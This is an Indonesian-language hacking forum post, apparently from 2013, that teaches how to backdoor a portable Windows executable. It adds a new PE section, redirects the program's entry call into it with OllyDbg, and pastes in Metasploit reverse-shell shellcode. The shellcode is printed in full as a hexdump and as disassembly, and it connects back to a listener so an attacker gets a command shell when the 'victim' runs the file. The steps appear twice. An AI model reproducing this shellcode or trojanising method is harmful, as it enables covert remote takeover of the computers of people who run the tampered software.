09-29-2013, 08:28 PM
Tutorial kali ini adalah salah satu contoh cara memasukan kode tambahan pada sebuah program portable pada Windows. Kode tersebut dapat berupa virus,backdoor,trojan,dll. Anda membutuhkan :
[HIDE]
1. XVI32 (Hex Editor)
2. LordPE
3. OLLYDBG
4. Metasploit
Anda dapat menemukan metasploit pada sistem operasi BackTrack maupun Kali-Linux.
Lets start.
Gw mau ngetest menginject sebuah software portable yang gw dapet dari temen2 gw di jogja. Nama tools tersebut adalah XLNC.
![[Image: tutorial-pe.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe.png)
Langkah pertama dari hal ini adalah memasukan header baru ke dalam file PE tersebut. gw gunakan LordPE
We got some information about basic header of the file
![[Image: tutorial-pe-1.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-1.png)
Klik Sections untuk melihat seluruh sections header di dalam file PE XLNC
![[Image: tutorial-pe-2.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-2.png)
Tambahkan sections kemudian edit nama, VirtualSize dan RawSize. Masukan VS dan RS masing 1000 – cukup untuk memasukan malicious code sederhana.
![[Image: tutorial-pe-3.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-3.png)
As you can see .. New Sections gw beri nama VirusZe
save the file.
![[Image: tutorial-pe-4.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-4.png)
Namun jika anda membuka file tersebut ternyata malah menghasilkan error.
![[Image: tutorial-pe-5.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-5.png)
Ok fix that with hex editor
![[Image: tutorial-pe-6.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-6.png)
Masukan hex string pada baris akhir. Masukan informasi seperti di atas. Then save it.
Ok we fix that error.
Ketika anda membuka file PE tersebut dengan olly maka anda akan di bawa pada Entry point dimana first instruction dari program akan di esekusi.
Pada memory mapping, kita sudah dapat melihat section header yang telah kita tambahkan tadi.
newsection name : VirusZe terlihat pada memory mapping
Detail :
Penting untuk diketahui alamat memory statik dari New Section adalah 0059D000
Hmm tertarik pada function call pertama
Kita modifikasi dengan fungsi JMP yang akan kita redirect ke memory 0059D000.
Setelah itu copy executable file dng selection untuk menyimpan perubahan. Then save it. gw simpen dng nama XLNC-01.exe
Buka file XLNC-01.exe di olly kembali… perhatikan
Modifikasi sejauh ini berhasil
![[Image: tutorial-pe-7.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-7.png)
oke as y see .. kita memiliki space kosong untuk menyisipkan malicious code.
then we must take it …
pada 2 baris memory pertama isikan fungsi PUSHAD & PUSHFD
Buatlah payload melalui metasploit .. owh man this is my favorite step….
![[Image: tutorial-pe-8.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-8.png)
Open the new shell code dgn hexeditor
![[Image: tutorial-pe-81.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-81.png)
Simple copy paste that binary code into the olly…
Okey anda mendapatkan code shell sudah di inject kedalam XLNC
Save it .. gw save dengan nama XLNC-02.exe
![[Image: tutorial-pe-9.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-9.png)
Gw start listener dng port yg sesuai dgn codeshell …
Ketika victim mengaktifkan file maka shell tercipta
![[Image: tutorial-pe-10.png]](http://zico-ekel.com/wp-content/uploads/2013/09/tutorial-pe-10.png)
Untuk membuat breakpoint pada section akan kita lanjuti di part II …TO BE CONTINUE - [/HIDE]
[HIDE]
1. XVI32 (Hex Editor)
2. LordPE
3. OLLYDBG
4. Metasploit
Quote:Notes : seluruh tools di atas dapat anda temukan di internet secara gratis dan mudah. (freeware)
Anda dapat menemukan metasploit pada sistem operasi BackTrack maupun Kali-Linux.
Lets start.
Gw mau ngetest menginject sebuah software portable yang gw dapet dari temen2 gw di jogja. Nama tools tersebut adalah XLNC.
Langkah pertama dari hal ini adalah memasukan header baru ke dalam file PE tersebut. gw gunakan LordPE
We got some information about basic header of the file
Klik Sections untuk melihat seluruh sections header di dalam file PE XLNC
Tambahkan sections kemudian edit nama, VirtualSize dan RawSize. Masukan VS dan RS masing 1000 – cukup untuk memasukan malicious code sederhana.
As you can see .. New Sections gw beri nama VirusZe
save the file.
Namun jika anda membuka file tersebut ternyata malah menghasilkan error.
Ok fix that with hex editor
Masukan hex string pada baris akhir. Masukan informasi seperti di atas. Then save it.
Ok we fix that error.
Ketika anda membuka file PE tersebut dengan olly maka anda akan di bawa pada Entry point dimana first instruction dari program akan di esekusi.
Code:
00500534 > $ 55 PUSH EBP
00500535 . 8BEC MOV EBP,ESP
00500537 . 83C4 F0 ADD ESP,-10
0050053A . B8 AC005000 MOV EAX,XLNC.005000AC
0050053F E8 8465F0FF CALL XLNC.00406AC8
00500544 . A1 505E5000 MOV EAX,
DWORD
PTR DS:[505E50]
00500549 . 8B00 MOV EAX,
DWORD
PTR DS:[EAX]
0050054B . E8 CC38F6FF CALL XLNC.00463E1C
00500550 . A1 505E5000 MOV EAX,
DWORD
PTR DS:[505E50]
00500555 . 8B00 MOV EAX,
DWORD
PTR DS:[EAX]
00500557 . BA AC055000 MOV EDX,XLNC.005005AC ; ASCII
"XLalu Nginjek v1.0"
0050055C . E8 B334F6FF CALL XLNC.00463A14
00500561 . 8B0D 8C5F5000 MOV ECX,
DWORD
PTR DS:[505F8C] ; XLNC.00508278
00500567 . A1 505E5000 MOV EAX,
DWORD
PTR DS:[505E50]
0050056C . 8B00 MOV EAX,
DWORD
PTR DS:[EAX]
0050056E . 8B15 D4FB4F00 MOV EDX,
DWORD
PTR DS:[4FFBD4] ; XLNC.004FFC20
00500574 . E8 BB38F6FF CALL XLNC.00463E34
00500579 . 8B0D D45F5000 MOV ECX,
DWORD
PTR DS:[505FD4] ; XLNC.00508270
0050057F . A1 505E5000 MOV EAX,
DWORD
PTR DS:[505E50]
00500584 . 8B00 MOV EAX,
DWORD
PTR DS:[EAX]
00500586 . 8B15 C8F94F00 MOV EDX,
DWORD
PTR DS:[4FF9C8] ; XLNC.004FFA14
0050058C . E8 A338F6FF CALL XLNC.00463E34
00500591 . A1 505E5000 MOV EAX,
DWORD
PTR DS:[505E50]
00500596 . 8B00 MOV EAX,
DWORD
PTR DS:[EAX]
00500598 . E8 1739F6FF CALL XLNC.00463EB4
0050059D . E8 9240F0FF CALL XLNC.00404634
005005A2 . 0000 ADD
BYTE
PTR DS:[EAX],AL
005005A4 . FFFFFFFF DD FFFFFFFF
005005A8 . 12000000 DD 00000012
005005AC . 58 4C 61 6C 75>ASCII
"XLalu Nginjek v1"
005005BC . 2E 30 00 ASCII
".0"
,0
005005BF 00 DB 00
005005C0 00 DB 00
005005C1 00 DB 00Pada memory mapping, kita sudah dapat melihat section header yang telah kita tambahkan tadi.
Code:
Memory map
Address Size Owner Section Contains Type Access Initial Mapped as
00010000 00001000 Priv RW RW
00020000 00001000 Priv RW RW
0012B000 00001000 Priv RW Guar RW
0012C000 00004000 stack of mai Priv RW Guar RW
00130000 00003000 Map R R
00140000 00002000 Map R R
00150000 00006000 Priv RW RW
00250000 00006000 Priv RW RW
00260000 00003000 Map RW RW
00270000 00016000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\unicode.nls
00290000 00041000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\locale.nls
002E0000 00041000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\sortkey.nls
00330000 00006000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\sorttbls.nls
00340000 00001000 Priv RW RW
00350000 00001000 Priv RW RW
00360000 00004000 Priv RW RW
00370000 00003000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\ctype.nls
00380000 00002000 Map R R
00390000 00002000 Map R R
00400000 00001000 XLNC PE header Imag R RWE
00401000 00100000 XLNC CODE code Imag R RWE
00501000 00006000 XLNC DATA data Imag R RWE
00507000 00002000 XLNC BSS Imag R RWE
00509000 00003000 XLNC .idata imports Imag R RWE
0050C000 00001000 XLNC .tls Imag R RWE
0050D000 00001000 XLNC .rdata Imag R RWE
0050E000 0000D000 XLNC .reloc relocations Imag R RWE
0051B000 00082000 XLNC .rsrc resources Imag R RWE
0059D000 00001000 XLNC .VirusZe Imag R RWE
005A0000 00003000 Map R E R E
00660000 00002000 Map R E R E
00670000 00103000 Map R R
00780000 0005D000 Map R E R E
77120000 00001000 oleaut32 PE header Imag R RWE
77121000 0007F000 oleaut32 .text code,imports Imag R RWE
771A0000 00001000 oleaut32 .orpc Imag R RWE
771A1000 00003000 oleaut32 .data data Imag R RWE
771A4000 00001000 oleaut32 .rsrc resources Imag R RWE
771A5000 00006000 oleaut32 .reloc relocations Imag R RWE
773D0000 00001000 comctl32 PE header Imag R RWE
773D1000 00091000 comctl32 .text code,imports Imag R RWE
77462000 00001000 comctl32 .data data Imag R RWE
77463000 0006A000 comctl32 .rsrc resources Imag R RWE
774CD000 00006000 comctl32 .reloc relocations Imag R RWE
774E0000 00001000 ole32 PE header Imag R RWE
774E1000 0011F000 ole32 .text code,imports Imag R RWE
77600000 00006000 ole32 .orpc code Imag R RWE
77606000 00007000 ole32 .data data Imag R RWE
7760D000 00002000 ole32 .rsrc resources Imag R RWE
7760F000 0000E000 ole32 .reloc relocations Imag R RWE
77C00000 00001000 version PE header Imag R RWE
77C01000 00004000 version .text code,imports Imag R RWE
77C05000 00001000 version .data data Imag R RWE
77C06000 00001000 version .rsrc resources Imag R RWE
77C07000 00001000 version .reloc relocations Imag R RWE
77C10000 00001000 msvcrt PE header Imag R RWE
77C11000 0004C000 msvcrt .text code,imports Imag R RWE
77C5D000 00007000 msvcrt .data data Imag R RWE
77C64000 00001000 msvcrt .rsrc resources Imag R RWE
77C65000 00003000 msvcrt .reloc relocations Imag R RWE
77DD0000 00001000 advapi32 PE header Imag R RWE
77DD1000 00075000 advapi32 .text code,imports Imag R RWE
77E46000 00005000 advapi32 .data data Imag R RWE
77E4B000 0001B000 advapi32 .rsrc resources Imag R RWE
77E66000 00005000 advapi32 .reloc relocations Imag R RWE
77E70000 00001000 RPCRT4 PE header Imag R RWE
77E71000 00083000 RPCRT4 .text code,imports Imag R RWE
77EF4000 00007000 RPCRT4 .orpc code Imag R RWE
77EFB000 00001000 RPCRT4 .data data Imag R RWE
77EFC000 00001000 RPCRT4 .rsrc resources Imag R RWE
77EFD000 00005000 RPCRT4 .reloc relocations Imag R RWE
77F10000 00001000 GDI32 PE header Imag R RWE
77F11000 00043000 GDI32 .text code,imports Imag R RWE
77F54000 00002000 GDI32 .data data Imag R RWE
77F56000 00001000 GDI32 .rsrc resources Imag R RWE
77F57000 00002000 GDI32 .reloc relocations Imag R RWE
77F60000 00001000 SHLWAPI PE header Imag R RWE
77F61000 0006C000 SHLWAPI .text code,imports Imag R RWE
77FCD000 00001000 SHLWAPI .data data Imag R RWE
77FCE000 00002000 SHLWAPI .rsrc resources Imag R RWE
77FD0000 00006000 SHLWAPI .reloc relocations Imag R RWE
77FE0000 00001000 Secur32 PE header Imag R RWE
77FE1000 0000D000 Secur32 .text code,imports Imag R RWE
77FEE000 00001000 Secur32 .data data Imag R RWE
77FEF000 00001000 Secur32 .rsrc resources Imag R RWE
77FF0000 00001000 Secur32 .reloc relocations Imag R RWE
7C800000 00001000 kernel32 PE header Imag R RWE
7C801000 00084000 kernel32 .text code,imports Imag R RWE
7C885000 00005000 kernel32 .data data Imag R RWE
7C88A000 00066000 kernel32 .rsrc resources Imag R RWE
7C8F0000 00006000 kernel32 .reloc relocations Imag R RWE
7C900000 00001000 ntdll PE header Imag R RWE
7C901000 0007A000 ntdll .text code,exports Imag R RWE
7C97B000 00005000 ntdll .data data Imag R RWE
7C980000 0002C000 ntdll .rsrc resources Imag R RWE
7C9AC000 00003000 ntdll .reloc relocations Imag R RWE
7C9C0000 00001000 shell32 PE header Imag R RWE
7C9C1000 001FE000 shell32 .text code,imports Imag R RWE
7CBBF000 0001D000 shell32 .data data Imag R RWE
7CBDC000 005E0000 shell32 .rsrc resources Imag R RWE
7D1BC000 0001B000 shell32 .reloc relocations Imag R RWE
7E410000 00001000 user32 PE header Imag R RWE
7E411000 00060000 user32 .text code,imports Imag R RWE
7E471000 00002000 user32 .data data Imag R RWE
7E473000 0002B000 user32 .rsrc resources Imag R RWE
7E49E000 00003000 user32 .reloc relocations Imag R RWE
7F6F0000 00007000 Map R E R E
7FFB0000 00024000 Map R R
7FFD9000 00001000 Priv RW RW
7FFDF000 00001000 data block o Priv RW RW
7FFE0000 00001000 Priv R Rnewsection name : VirusZe terlihat pada memory mapping
Detail :
Code:
Memory map, item 28
Address=0059D000
Size=00001000 (4096.)
Owner=XLNC 00400000
Section=.VirusZe
Type=Imag 01001002
Access=R
Initial access=RWEPenting untuk diketahui alamat memory statik dari New Section adalah 0059D000
Hmm tertarik pada function call pertama
Code:
0050053F E8 8465F0FF CALL XLNC.00406AC8Kita modifikasi dengan fungsi JMP yang akan kita redirect ke memory 0059D000.
Setelah itu copy executable file dng selection untuk menyimpan perubahan. Then save it. gw simpen dng nama XLNC-01.exe
Buka file XLNC-01.exe di olly kembali… perhatikan
Code:
00500534 > $ 55 PUSH EBP
00500535 . 8BEC MOV EBP,ESP
00500537 . 83C4 F0 ADD ESP,-10
0050053A . B8 AC005000 MOV EAX,XLNC-01.005000AC
0050053F .-E9 BCCA0900 JMP XLNC-01.0059D000
00500544 A1 DB A1
00500545 . 505E5000 DD XLNC-01.00505E50
00500549 8B DB 8B
0050054A . 00E8 ADD AL,CHModifikasi sejauh ini berhasil
Code:
0050053F .-E9 BCCA0900 JMP XLNC-01.0059D000oke as y see .. kita memiliki space kosong untuk menyisipkan malicious code.
then we must take it …
pada 2 baris memory pertama isikan fungsi PUSHAD & PUSHFD
Code:
0059D000 60 PUSHAD
0059D001 9C PUSHFDBuatlah payload melalui metasploit .. owh man this is my favorite step….
Open the new shell code dgn hexeditor
Code:
root@31c3L:/opt/metasploit/msf3# hexdump -C shell
00000000 fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b |......`..1.d.R0.|
00000010 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 |R..R..r(..J&1.1.|
00000020 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 |.<a|., .......RW|
00000030 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 |.R..B<[email protected].|
00000040 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b |.P.H..X ...<I.4.|
00000050 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 |..1.1.......8.u.|
00000060 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b |.}.;}$u.X.X$..f.|
00000070 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 |.K.X.........D$$|
00000080 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d |[[aYZQ..X_Z....]|
00000090 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 |h32..hws2_ThLw&.|
000000a0 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 |.......).TPh).k.|
000000b0 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff |..PPPP@P@Ph.....|
000000c0 d5 89 c7 68 c0 a8 01 64 68 02 00 01 bb 89 e6 6a |...h...dh......j|
000000d0 10 56 57 68 99 a5 74 61 ff d5 68 63 6d 64 00 89 |.VWh..ta..hcmd..|
000000e0 e3 57 57 57 31 f6 6a 12 59 56 e2 fd 66 c7 44 24 |.WWW1.j.YV..f.D$|
000000f0 3c 01 01 8d 44 24 10 c6 00 44 54 50 56 56 56 46 |<...D$...DTPVVVF|
00000100 56 4e 56 56 53 56 68 79 cc 3f 86 ff d5 89 e0 4e |VNVVSVhy.?.....N|
00000110 56 46 ff 30 68 08 87 1d 60 ff d5 bb f0 b5 a2 56 |VF.0h...`......V|
00000120 68 a6 95 bd 9d ff d5 3c 06 7c 0a 80 fb e0 75 05 |h......<.|....u.|
00000130 bb 47 13 72 6f 6a 00 53 ff d5 |.G.roj.S..|
0000013aSimple copy paste that binary code into the olly…
Okey anda mendapatkan code shell sudah di inject kedalam XLNC
Code:
0059D000 60 PUSHAD
0059D001 9C PUSHFD
0059D002 FC CLD
0059D003 E8 89000000 CALL XLNC-01.0059D091
0059D008 60 PUSHAD
0059D009 89E5 MOV EBP,ESP
0059D00B 31D2 XOR EDX,EDX
0059D00D 64:8B52 30 MOV EDX,DWORD PTR FS:[EDX+30]
0059D011 8B52 0C MOV EDX,DWORD PTR DS:[EDX+C]
0059D014 8B52 14 MOV EDX,DWORD PTR DS:[EDX+14]
0059D017 8B72 28 MOV ESI,DWORD PTR DS:[EDX+28]
0059D01A 0FB74A 26 MOVZX ECX,WORD PTR DS:[EDX+26]
0059D01E 31FF XOR EDI,EDI
0059D020 31C0 XOR EAX,EAX
0059D022 AC LODS BYTE PTR DS:[ESI]
0059D023 3C 61 CMP AL,61
0059D025 7C 02 JL SHORT XLNC-01.0059D029
0059D027 2C 20 SUB AL,20
0059D029 C1CF 0D ROR EDI,0D
0059D02C 01C7 ADD EDI,EAX
0059D02E ^E2 F0 LOOPD SHORT XLNC-01.0059D020
0059D030 52 PUSH EDX
0059D031 57 PUSH EDI
0059D032 8B52 10 MOV EDX,DWORD PTR DS:[EDX+10]
0059D035 8B42 3C MOV EAX,DWORD PTR DS:[EDX+3C]
0059D038 01D0 ADD EAX,EDX
0059D03A 8B40 78 MOV EAX,DWORD PTR DS:[EAX+78]
0059D03D 85C0 TEST EAX,EAX
0059D03F 74 4A JE SHORT XLNC-01.0059D08B
0059D041 01D0 ADD EAX,EDX
0059D043 50 PUSH EAX
0059D044 8B48 18 MOV ECX,DWORD PTR DS:[EAX+18]
0059D047 8B58 20 MOV EBX,DWORD PTR DS:[EAX+20]
0059D04A 01D3 ADD EBX,EDX
0059D04C E3 3C JECXZ SHORT XLNC-01.0059D08A
0059D04E 49 DEC ECX
0059D04F 8B348B MOV ESI,DWORD PTR DS:[EBX+ECX*4]
0059D052 01D6 ADD ESI,EDX
0059D054 31FF XOR EDI,EDI
0059D056 31C0 XOR EAX,EAX
0059D058 AC LODS BYTE PTR DS:[ESI]
0059D059 C1CF 0D ROR EDI,0D
0059D05C 01C7 ADD EDI,EAX
0059D05E 38E0 CMP AL,AH
0059D060 ^75 F4 JNZ SHORT XLNC-01.0059D056
0059D062 037D F8 ADD EDI,DWORD PTR SS:[EBP-8]
0059D065 3B7D 24 CMP EDI,DWORD PTR SS:[EBP+24]
0059D068 ^75 E2 JNZ SHORT XLNC-01.0059D04C
0059D06A 58 POP EAX
0059D06B 8B58 24 MOV EBX,DWORD PTR DS:[EAX+24]
0059D06E 01D3 ADD EBX,EDX
0059D070 66:8B0C4B MOV CX,WORD PTR DS:[EBX+ECX*2]
0059D074 8B58 1C MOV EBX,DWORD PTR DS:[EAX+1C]
0059D077 01D3 ADD EBX,EDX
0059D079 8B048B MOV EAX,DWORD PTR DS:[EBX+ECX*4]
0059D07C 01D0 ADD EAX,EDX
0059D07E 894424 24 MOV DWORD PTR SS:[ESP+24],EAX
0059D082 5B POP EBX
0059D083 5B POP EBX
0059D084 61 POPAD
0059D085 59 POP ECX
0059D086 5A POP EDX
0059D087 51 PUSH ECX
0059D088 FFE0 JMP EAX
0059D08A 58 POP EAX
0059D08B 5F POP EDI
0059D08C 5A POP EDX
0059D08D 8B12 MOV EDX,DWORD PTR DS:[EDX]
0059D08F ^EB 86 JMP SHORT XLNC-01.0059D017
0059D091 5D POP EBP
0059D092 68 33320000 PUSH 3233
0059D097 68 7773325F PUSH 5F327377
0059D09C 54 PUSH ESP
0059D09D 68 4C772607 PUSH 726774C
0059D0A2 FFD5 CALL EBP
0059D0A4 B8 90010000 MOV EAX,190
0059D0A9 29C4 SUB ESP,EAX
0059D0AB 54 PUSH ESP
0059D0AC 50 PUSH EAX
0059D0AD 68 29806B00 PUSH 6B8029
0059D0B2 FFD5 CALL EBP
0059D0B4 50 PUSH EAX
0059D0B5 50 PUSH EAX
0059D0B6 50 PUSH EAX
0059D0B7 50 PUSH EAX
0059D0B8 40 INC EAX
0059D0B9 50 PUSH EAX
0059D0BA 40 INC EAX
0059D0BB 50 PUSH EAX
0059D0BC 68 EA0FDFE0 PUSH E0DF0FEA
0059D0C1 FFD5 CALL EBP
0059D0C3 89C7 MOV EDI,EAX
0059D0C5 68 C0A80164 PUSH 6401A8C0
0059D0CA 68 020001BB PUSH BB010002
0059D0CF 89E6 MOV ESI,ESP
0059D0D1 6A 10 PUSH 10
0059D0D3 56 PUSH ESI
0059D0D4 57 PUSH EDI
0059D0D5 68 99A57461 PUSH 6174A599
0059D0DA FFD5 CALL EBP
0059D0DC 68 636D6400 PUSH 646D63
0059D0E1 89E3 MOV EBX,ESP
0059D0E3 57 PUSH EDI
0059D0E4 57 PUSH EDI
0059D0E5 57 PUSH EDI
0059D0E6 31F6 XOR ESI,ESI
0059D0E8 6A 12 PUSH 12
0059D0EA 59 POP ECX
0059D0EB 56 PUSH ESI
0059D0EC ^E2 FD LOOPD SHORT XLNC-01.0059D0EB
0059D0EE 66:C74424 3C 010>MOV WORD PTR SS:[ESP+3C],101
0059D0F5 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
0059D0F9 C600 44 MOV BYTE PTR DS:[EAX],44
0059D0FC 54 PUSH ESP
0059D0FD 50 PUSH EAX
0059D0FE 56 PUSH ESI
0059D0FF 56 PUSH ESI
0059D100 56 PUSH ESI
0059D101 46 INC ESI
0059D102 56 PUSH ESI
0059D103 4E DEC ESI
0059D104 56 PUSH ESI
0059D105 56 PUSH ESI
0059D106 53 PUSH EBX
0059D107 56 PUSH ESI
0059D108 68 79CC3F86 PUSH 863FCC79
0059D10D FFD5 CALL EBP
0059D10F 89E0 MOV EAX,ESP
0059D111 4E DEC ESI
0059D112 56 PUSH ESI
0059D113 46 INC ESI
0059D114 FF30 PUSH DWORD PTR DS:[EAX]
0059D116 68 08871D60 PUSH 601D8708
0059D11B FFD5 CALL EBP
0059D11D BB F0B5A256 MOV EBX,56A2B5F0
0059D122 BB 4713726F MOV EBX,6F721347
0059D127 6A 00 PUSH 0
0059D129 53 PUSH EBX
0059D12A FFD5 CALL EBP
0059D12C 0000 ADD BYTE PTR DS:[EAX],AL
0059D12E 013A ADD DWORD PTR DS:[EDX],EDI
0059D130 0000 ADD BYTE PTR DS:[EAX],AL
0059D132 0000 ADD BYTE PTR DS:[EAX],ALSave it .. gw save dengan nama XLNC-02.exe
Gw start listener dng port yg sesuai dgn codeshell …
Ketika victim mengaktifkan file maka shell tercipta
Untuk membuat breakpoint pada section akan kita lanjuti di part II …TO BE CONTINUE - [/HIDE]
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only
